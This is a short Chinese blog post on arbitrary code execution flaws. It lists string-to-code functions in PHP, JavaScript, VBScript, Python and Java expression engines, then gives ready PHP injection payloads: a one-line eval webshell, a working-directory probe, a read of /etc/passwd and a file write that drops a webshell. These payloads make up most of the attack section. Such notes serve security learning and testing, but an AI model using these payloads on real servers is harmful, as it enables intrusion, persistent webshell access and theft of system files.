任意代码执行

应用程序在调用一些函数时，此类函数可以将字符串转化为代码，从而导致任意代码执行
PHP：eval、assert 、preg_replace( ) + /e 模式(PHP版本 < 5.5.0)
Javascript：eval
Vbscript: Execute、Eval
Python：exec
Java：Java中没有类似php中eval函数这种直接可以将字符串转化为代码执行的函数，但是有反射机制，并且有各种基于反射机制的表达式引擎，如：OGNL、SpEL、MVEL等，这些都能造成代码执行漏洞

任意代码

一句话木马： ${@eval($ _POST[1])}
获取当前工作路径： ${exit(print(getcwd()))} 读文件：$ {exit(var_dump(file_get_contents( $_POST[f])))} f=/etc/passwd 写webshell：$ {exit(var_dump(file_put_contents( $_POST[f],$ _POST[d])))} f=1.php&d=1111111

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

友情链接更多精彩内容

赞1赞

赞赏

手机看全文